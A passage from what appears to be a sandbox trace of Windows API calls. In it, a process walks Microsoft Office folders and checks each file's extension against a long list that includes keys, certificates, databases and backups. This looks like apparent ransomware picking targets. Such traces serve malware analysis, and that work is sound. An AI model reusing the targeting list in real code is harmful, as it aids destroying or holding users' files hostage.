cFileName="1033", cAlternateFileName="")) returned 1 [0272.414] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\*", lpFindFileData=0x3cdf310 | out: lpFindFileData=0x3cdf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebb910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21c6910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21c6910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3581040 [0272.415] FindNextFileW (in: hFindFile=0x3581040, lpFindFileData=0x3cdf310 | out: lpFindFileData=0x3cdf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebb910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21c6910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21c6910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0272.415] FindNextFileW (in: hFindFile=0x3581040, lpFindFileData=0x3cdf310 | out: lpFindFileData=0x3cdf310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x460d6f00, ftCreationTime.dwHighDateTime=0x1bdcbd5, ftLastAccessTime.dwLowDateTime=0xebb910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x460d6f00, ftLastWriteTime.dwHighDateTime=0x1bdcbd5, nFileSizeHigh=0x0, nFileSizeLow=0x176f, dwReserved0=0x0, dwReserved1=0x0, cFileName="CURRENCY.GIF", cAlternateFileName="")) returned 1 [0272.416] FindClose (in: hFindFile=0x3581040 | out: hFindFile=0x3581040) returned 1 [0272.417] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x42dd078 | out: hHeap=0x4a0000) returned 1 [0272.417] FindNextFileW (in: hFindFile=0x3580ec0, lpFindFileData=0x3cdf58c | out: lpFindFileData=0x3cdf58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebb910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21c6910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21c6910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0272.417] FindClose (in: hFindFile=0x3580ec0 | out: hFindFile=0x3580ec0) returned 1 [0272.417] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3595468 | out: hHeap=0x4a0000) returned 1 [0272.417] FindNextFileW (in: hFindFile=0x3580a40, lpFindFileData=0x3cdf808 | out: lpFindFileData=0x3cdf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf59f9270, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0272.417] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\*", lpFindFileData=0x3cdf58c | out: lpFindFileData=0x3cdf58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf59f9270, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3580ec0 [0272.423] FindNextFileW (in: hFindFile=0x3580ec0, lpFindFileData=0x3cdf58c | out: lpFindFileData=0x3cdf58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf59f9270, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0272.423] FindNextFileW (in: hFindFile=0x3580ec0, lpFindFileData=0x3cdf58c | out: lpFindFileData=0x3cdf58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf59f9270, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf577d00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0272.424] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\*", lpFindFileData=0x3cdf310 | out: lpFindFileData=0x3cdf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf59f9270, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf577d00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3581040 [0272.432] FindNextFileW (in: hFindFile=0x3581040, lpFindFileData=0x3cdf310 | out: lpFindFileData=0x3cdf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf59f9270, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf577d00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0272.433] FindNextFileW (in: hFindFile=0x3581040, lpFindFileData=0x3cdf310 | out: lpFindFileData=0x3cdf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14ebe6b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15087730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x15087730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access", cAlternateFileName="")) returned 1 [0272.433] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\*", lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14ebe6b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15087730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x15087730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3580980 [0272.437] FindNextFileW (in: hFindFile=0x3580980, lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14ebe6b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15087730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x15087730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0272.437] FindNextFileW (in: hFindFile=0x3580980, lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2355ff00, ftCreationTime.dwHighDateTime=0x1caa4fd, ftLastAccessTime.dwLowDateTime=0x14ee4810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2355ff00, ftLastWriteTime.dwHighDateTime=0x1caa4fd, nFileSizeHigh=0x0, nFileSizeLow=0xfd04e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Assets.accdt", cAlternateFileName="ASSETS~1.ACC")) returned 1 [0272.437] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\*", lpFindFileData=0x3cdee18 | out: lpFindFileData=0x3cdee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14f30ad0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x14f56c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x14f56c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3581140 [0272.444] FindNextFileW (in: hFindFile=0x3581140, lpFindFileData=0x3cdee18 | out: lpFindFileData=0x3cdee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14f30ad0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x14f56c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x14f56c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0272.444] FindNextFileW (in: hFindFile=0x3581140, lpFindFileData=0x3cdee18 | out: lpFindFileData=0x3cdee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2224d200, ftCreationTime.dwHighDateTime=0x1caa4fd, ftLastAccessTime.dwLowDateTime=0x14f30ad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2224d200, ftLastWriteTime.dwHighDateTime=0x1caa4fd, nFileSizeHigh=0x0, nFileSizeLow=0x1141, dwReserved0=0x0, dwReserved1=0x0, cFileName="Address.accft", cAlternateFileName="ADDRES~1.ACC")) returned 1 [0272.445] FindClose (in: hFindFile=0x3581140 | out: hFindFile=0x3581140) returned 1 [0272.446] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4210058 | out: hHeap=0x4a0000) returned 1 [0272.446] FindNextFileW (in: hFindFile=0x3580980, lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcad4b00, ftCreationTime.dwHighDateTime=0x1c6d84b, ftLastAccessTime.dwLowDateTime=0x14f56c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfcad4b00, ftLastWriteTime.dwHighDateTime=0x1c6d84b, nFileSizeHigh=0x0, nFileSizeLow=0x2f2af, dwReserved0=0x0, dwReserved1=0x0, cFileName="Events.accdt", cAlternateFileName="EVENTS~1.ACC")) returned 1 [0272.446] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\*", lpFindFileData=0x3cdee18 | out: lpFindFileData=0x3cdee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14fa2ef0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x150615d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x150615d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3581140 [0272.457] FindNextFileW (in: hFindFile=0x3581140, lpFindFileData=0x3cdee18 | out: lpFindFileData=0x3cdee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14fa2ef0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x150615d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x150615d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0272.457] FindNextFileW (in: hFindFile=0x3581140, lpFindFileData=0x3cdee18 | out: lpFindFileData=0x3cdee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bae3a00, ftCreationTime.dwHighDateTime=0x1caa4fd, ftLastAccessTime.dwLowDateTime=0x14fa2ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2bae3a00, ftLastWriteTime.dwHighDateTime=0x1caa4fd, nFileSizeHigh=0x0, nFileSizeLow=0x5fda, dwReserved0=0x0, dwReserved1=0x0, cFileName="1 Right.accdt", cAlternateFileName="1RIGHT~1.ACC")) returned 1 [0272.457] FindClose (in: hFindFile=0x3581140 | out: hFindFile=0x3581140) returned 1 [0272.458] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4210058 | out: hHeap=0x4a0000) returned 1 [0272.458] FindNextFileW (in: hFindFile=0x3580980, lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9bbcc000, ftCreationTime.dwHighDateTime=0x1caa4fd, ftLastAccessTime.dwLowDateTime=0x150615d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9bbcc000, ftLastWriteTime.dwHighDateTime=0x1caa4fd, nFileSizeHigh=0x0, nFileSizeLow=0x15cc78, dwReserved0=0x0, dwReserved1=0x0, cFileName="Projects.accdt", cAlternateFileName="PROJEC~1.ACC")) returned 1 [0272.458] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\*", lpFindFileData=0x3cdee18 | out: lpFindFileData=0x3cdee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14ebe6b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x14ee4810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x14ee4810, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3581140 [0272.458] FindNextFileW (in: hFindFile=0x3581140, lpFindFileData=0x3cdee18 | out: lpFindFileData=0x3cdee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14ebe6b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x14ee4810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x14ee4810, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0272.458] FindNextFileW (in: hFindFile=0x3581140, lpFindFileData=0x3cdee18 | out: lpFindFileData=0x3cdee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1353a200, ftCreationTime.dwHighDateTime=0x1c6d84c, ftLastAccessTime.dwLowDateTime=0x14ebe6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1353a200, ftLastWriteTime.dwHighDateTime=0x1c6d84c, nFileSizeHigh=0x0, nFileSizeLow=0x377c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="107.accdt", cAlternateFileName="107~1.ACC")) returned 1 [0272.873] lstrlenW (lpString=".opt") returned 4 [0272.873] lstrcmpiW (lpString1=".opt", lpString2=".png") returned -1 [0272.873] lstrlenW (lpString=".oqy") returned 4 [0272.873] lstrcmpiW (lpString1=".oqy", lpString2=".png") returned -1 [0272.873] lstrlenW (lpString=".orf") returned 4 [0272.873] lstrcmpiW (lpString1=".orf", lpString2=".png") returned -1 [0272.873] lstrlenW (lpString=".p12") returned 4 [0272.873] lstrcmpiW (lpString1=".p12", lpString2=".png") returned -1 [0272.873] lstrlenW (lpString=".p7b") returned 4 [0272.873] lstrcmpiW (lpString1=".p7b", lpString2=".png") returned -1 [0272.873] lstrlenW (lpString=".p7c") returned 4 [0272.873] lstrcmpiW (lpString1=".p7c", lpString2=".png") returned -1 [0272.873] lstrlenW (lpString=".pam") returned 4 [0272.873] lstrcmpiW (lpString1=".pam", lpString2=".png") returned -1 [0272.873] lstrlenW (lpString=".pbm") returned 4 [0272.873] lstrcmpiW (lpString1=".pbm", lpString2=".png") returned -1 [0272.873] lstrlenW (lpString=".pct") returned 4 [0272.873] lstrcmpiW (lpString1=".pct", lpString2=".png") returned -1 [0272.873] lstrlenW (lpString=".pcx") returned 4 [0272.873] lstrcmpiW (lpString1=".pcx", lpString2=".png") returned -1 [0272.873] lstrlenW (lpString=".pdd") returned 4 [0272.873] lstrcmpiW (lpString1=".pdd", lpString2=".png") returned -1 [0272.873] lstrlenW (lpString=".pdf") returned 4 [0272.874] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0272.874] lstrlenW (lpString=".pdp") returned 4 [0272.874] lstrcmpiW (lpString1=".pdp", lpString2=".png") returned -1 [0272.874] lstrlenW (lpString=".pef") returned 4 [0272.874] lstrcmpiW (lpString1=".pef", lpString2=".png") returned -1 [0272.874] lstrlenW (lpString=".pem") returned 4 [0272.874] lstrcmpiW (lpString1=".pem", lpString2=".png") returned -1 [0272.874] lstrlenW (lpString=".pff") returned 4 [0272.874] lstrcmpiW (lpString1=".pff", lpString2=".png") returned -1 [0272.874] lstrlenW (lpString=".pfm") returned 4 [0272.874] lstrcmpiW (lpString1=".pfm", lpString2=".png") returned -1 [0272.874] lstrlenW (lpString=".pfx") returned 4 [0272.874] lstrcmpiW (lpString1=".pfx", lpString2=".png") returned -1 [0272.874] lstrlenW (lpString=".pgm") returned 4 [0272.874] lstrcmpiW (lpString1=".pgm", lpString2=".png") returned -1 [0272.874] lstrlenW (lpString=".php") returned 4 [0272.874] lstrcmpiW (lpString1=".php", lpString2=".png") returned -1 [0272.874] lstrlenW (lpString=".php3") returned 5 [0272.874] lstrcmpiW (lpString1=".php3", lpString2="t.png") returned -1 [0272.874] lstrlenW (lpString=".php4") returned 5 [0272.874] lstrcmpiW (lpString1=".php4", lpString2="t.png") returned -1 [0272.874] lstrlenW (lpString=".php5") returned 5 [0272.874] lstrcmpiW (lpString1=".php5", lpString2="t.png") returned -1 [0272.874] lstrlenW (lpString=".phtml") returned 6 [0272.874] lstrcmpiW (lpString1=".phtml", lpString2="ot.png") returned -1 [0272.874] lstrlenW (lpString=".pict") returned 5 [0272.874] lstrcmpiW (lpString1=".pict", lpString2="t.png") returned -1 [0272.874] lstrlenW (lpString=".pl") returned 3 [0272.874] lstrcmpiW (lpString1=".pl", lpString2="png") returned -1 [0272.874] lstrlenW (lpString=".pls") returned 4 [0272.875] lstrcmpiW (lpString1=".pls", lpString2=".png") returned -1 [0272.875] lstrlenW (lpString=".pm") returned 3 [0272.875] lstrcmpiW (lpString1=".pm", lpString2="png") returned -1 [0272.875] lstrlenW (lpString=".png") returned 4 [0272.875] lstrcmpiW (lpString1=".png", lpString2=".png") returned 0 [0272.875] FindNextFileW (in: hFindFile=0x3581100, lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8239fda1, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8239fda1, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x281a7b81, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xcb, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext.png", cAlternateFileName="")) returned 1 [0272.875] lstrlenW (lpString="bNext.png") returned 9 [0272.875] lstrlenW (lpString=".1cd") returned 4 [0272.875] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0272.875] lstrlenW (lpString=".3ds") returned 4 [0272.875] lstrcmpiW (lpString1=".3ds", lpString2=".png") returned -1 [0272.875] lstrlenW (lpString=".3fr") returned 4 [0272.875] lstrcmpiW (lpString1=".3fr", lpString2=".png") returned -1 [0272.875] lstrlenW (lpString=".3g2") returned 4 [0272.875] lstrcmpiW (lpString1=".3g2", lpString2=".png") returned -1 [0272.875] lstrlenW (lpString=".3gp") returned 4 [0272.875] lstrcmpiW (lpString1=".3gp", lpString2=".png") returned -1 [0272.875] lstrlenW (lpString=".7z") returned 3 [0272.875] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0272.875] lstrlenW (lpString=".accda") returned 6 [0272.875] lstrcmpiW (lpString1=".accda", lpString2="xt.png") returned -1 [0272.875] lstrlenW (lpString=".accdb") returned 6 [0272.875] lstrcmpiW (lpString1=".accdb", lpString2="xt.png") returned -1 [0272.875] lstrlenW (lpString=".accdc") returned 6 [0272.875] lstrcmpiW (lpString1=".accdc", lpString2="xt.png") returned -1 [0272.875] lstrlenW (lpString=".accde") returned 6 [0272.875] lstrcmpiW (lpString1=".accde", lpString2="xt.png") returned -1 [0272.875] lstrlenW (lpString=".accdt") returned 6 [0272.875] lstrcmpiW (lpString1=".accdt", lpString2="xt.png") returned -1 [0272.875] lstrlenW (lpString=".accdw") returned 6 [0272.875] lstrcmpiW (lpString1=".accdw", lpString2="xt.png") returned -1 [0272.875] lstrlenW (lpString=".adb") returned 4 [0272.875] lstrcmpiW (lpString1=".adb", lpString2=".png") returned -1 [0272.875] lstrlenW (lpString=".adp") returned 4 [0272.875] lstrcmpiW (lpString1=".adp", lpString2=".png") returned -1 [0272.876] lstrlenW (lpString=".ai") returned 3 [0272.876] lstrcmpiW (lpString1=".ai", lpString2="png") returned -1 [0272.876] lstrlenW (lpString=".ai3") returned 4 [0272.876] lstrcmpiW (lpString1=".ai3", lpString2=".png") returned -1 [0272.876] lstrlenW (lpString=".ai4") returned 4 [0272.876] lstrcmpiW (lpString1=".ai4", lpString2=".png") returned -1 [0272.876] lstrlenW (lpString=".ai5") returned 4 [0272.876] lstrcmpiW (lpString1=".ai5", lpString2=".png") returned -1 [0272.876] lstrlenW (lpString=".ai6") returned 4 [0272.876] lstrcmpiW (lpString1=".ai6", lpString2=".png") returned -1 [0272.876] lstrlenW (lpString=".ai7") returned 4 [0272.876] lstrcmpiW (lpString1=".ai7", lpString2=".png") returned -1 [0272.876] lstrlenW (lpString=".ai8") returned 4 [0272.876] lstrcmpiW (lpString1=".ai8", lpString2=".png") returned -1 [0272.876] lstrlenW (lpString=".anim") returned 5 [0272.876] lstrcmpiW (lpString1=".anim", lpString2="t.png") returned -1 [0272.876] lstrlenW (lpString=".arw") returned 4 [0272.876] lstrcmpiW (lpString1=".arw", lpString2=".png") returned -1 [0272.876] lstrlenW (lpString=".as") returned 3 [0272.876] lstrcmpiW (lpString1=".as", lpString2="png") returned -1 [0272.876] lstrlenW (lpString=".asa") returned 4 [0272.876] lstrcmpiW (lpString1=".asa", lpString2=".png") returned -1 [0272.876] lstrlenW (lpString=".asc") returned 4 [0272.876] lstrcmpiW (lpString1=".asc", lpString2=".png") returned -1 [0272.876] lstrlenW (lpString=".ascx") returned 5 [0272.876] lstrcmpiW (lpString1=".ascx", lpString2="t.png") returned -1 [0272.876] lstrlenW (lpString=".asm") returned 4 [0272.876] lstrcmpiW (lpString1=".asm", lpString2=".png") returned -1 [0272.876] lstrlenW (lpString=".asmx") returned 5 [0272.876] lstrcmpiW (lpString1=".asmx", lpString2="t.png") returned -1 [0272.876] lstrlenW (lpString=".asp") returned 4 [0272.876] lstrcmpiW (lpString1=".asp", lpString2=".png") returned -1 [0272.876] lstrlenW (lpString=".aspx") returned 5 [0272.876] lstrcmpiW (lpString1=".aspx", lpString2="t.png") returned -1 [0272.876] lstrlenW (lpString=".asr") returned 4 [0272.876] lstrcmpiW (lpString1=".asr", lpString2=".png") returned -1 [0272.876] lstrlenW (lpString=".asx") returned 4 [0272.877] lstrcmpiW (lpString1=".asx", lpString2=".png") returned -1 [0272.877] lstrlenW (lpString=".avi") returned 4 [0272.877] lstrcmpiW (lpString1=".avi", lpString2=".png") returned -1 [0272.877] lstrlenW (lpString=".avs") returned 4 [0272.877] lstrcmpiW (lpString1=".avs", lpString2=".png") returned -1 [0272.877] lstrlenW (lpString=".backup") returned 7 [0272.877] lstrcmpiW (lpString1=".backup", lpString2="ext.png") returned -1 [0272.877] lstrlenW (lpString=".bak") returned 4 [0272.877] lstrcmpiW (lpString1=".bak", lpString2=".png") returned -1 [0272.877] lstrlenW (lpString=".bay") returned 4 [0272.877] lstrcmpiW (lpString1=".bay", lpString2=".png") returned -1 [0272.877] lstrlenW (lpString=".bd") returned 3 [0272.877] lstrcmpiW (lpString1=".bd", lpString2="png") returned -1 [0272.877] lstrlenW (lpString=".bin") returned 4 [0272.877] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0272.877] lstrlenW (lpString=".bmp") returned 4 [0272.877] lstrcmpiW (lpString1=".bmp", lpString2=".png") returned -1 [0272.877] lstrlenW (lpString=".bz2") returned 4 [0272.877] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0272.877] lstrlenW (lpString=".c") returned 2 [0272.877] lstrcmpiW (lpString1=".c", lpString2="ng") returned -1 [0272.877] lstrlenW (lpString=".cdr") returned 4 [0272.877] lstrcmpiW (lpString1=".cdr", lpString2=".png") returned -1 [0272.877] lstrlenW (lpString=".cer") returned 4 [0272.877] lstrcmpiW (lpString1=".cer", lpString2=".png") returned -1 [0272.877] lstrlenW (lpString=".cf") returned 3 [0272.877] lstrcmpiW (lpString1=".cf", lpString2="png") returned -1 [0272.877] lstrlenW (lpString=".cfc") returned 4 [0272.877] lstrcmpiW (lpString1=".cfc", lpString2=".png") returned -1 [0272.877] lstrlenW (lpString=".cfm") returned 4 [0272.877] lstrcmpiW (lpString1=".cfm", lpString2=".png") returned -1 [0272.877] lstrlenW (lpString=".cfml") returned 5 [0272.877] lstrcmpiW (lpString1=".cfml", lpString2="t.png") returned -1 [0272.877] lstrlenW (lpString=".cfu") returned 4 [0272.877] lstrcmpiW (lpString1=".cfu", lpString2=".png") returned -1 [0272.877] lstrlenW (lpString=".chm") returned 4 [0272.877] lstrcmpiW (lpString1=".chm", lpString2=".png") returned -1 [0272.877] lstrlenW (lpString=".cin") returned 4 [0272.878] lstrcmpiW (lpString1=".cin", lpString2=".png") returned -1 [0272.878] lstrlenW (lpString=".class") returned 6 [0272.878] lstrcmpiW (lpString1=".class", lpString2="xt.png") returned -1 [0272.878] lstrlenW (lpString=".clx") returned 4 [0272.878] lstrcmpiW (lpString1=".clx", lpString2=".png") returned -1 [0272.878] lstrlenW (lpString=".config") returned 7 [0272.878] lstrcmpiW (lpString1=".config", lpString2="ext.png") returned -1 [0272.878] lstrlenW (lpString=".cpp") returned 4 [0272.878] lstrcmpiW (lpString1=".cpp", lpString2=".png") returned -1 [0272.878] lstrlenW (lpString=".cr2") returned 4 [0272.878] lstrcmpiW (lpString1=".cr2", lpString2=".png") returned -1 [0272.878] lstrlenW (lpString=".crt") returned 4 [0272.878] lstrcmpiW (lpString1=".crt", lpString2=".png") returned -1 [0272.878] lstrlenW (lpString=".crw") returned 4 [0272.878] lstrcmpiW (lpString1=".crw", lpString2=".png") returned -1 [0272.878] lstrlenW (lpString=".cs") returned 3 [0272.878] lstrcmpiW (lpString1=".cs", lpString2="png") returned -1 [0272.878] lstrlenW (lpString=".css") returned 4 [0272.878] lstrcmpiW (lpString1=".css", lpString2=".png") returned -1 [0272.878] lstrlenW (lpString=".csv") returned 4 [0272.878] lstrcmpiW (lpString1=".csv", lpString2=".png") returned -1 [0272.878] lstrlenW (lpString=".cub") returned 4 [0272.878] lstrcmpiW (lpString1=".cub", lpString2=".png") returned -1 [0272.878] lstrlenW (lpString=".dae") returned 4 [0272.878] lstrcmpiW (lpString1=".dae", lpString2=".png") returned -1 [0272.878] lstrlenW (lpString=".dat") returned 4 [0272.878] lstrcmpiW (lpString1=".dat", lpString2=".png") returned -1 [0272.878] lstrlenW (lpString=".db") returned 3 [0272.878] lstrcmpiW (lpString1=".db", lpString2="png") returned -1 [0272.878] lstrlenW (lpString=".dbf") returned 4 [0272.878] lstrcmpiW (lpString1=".dbf", 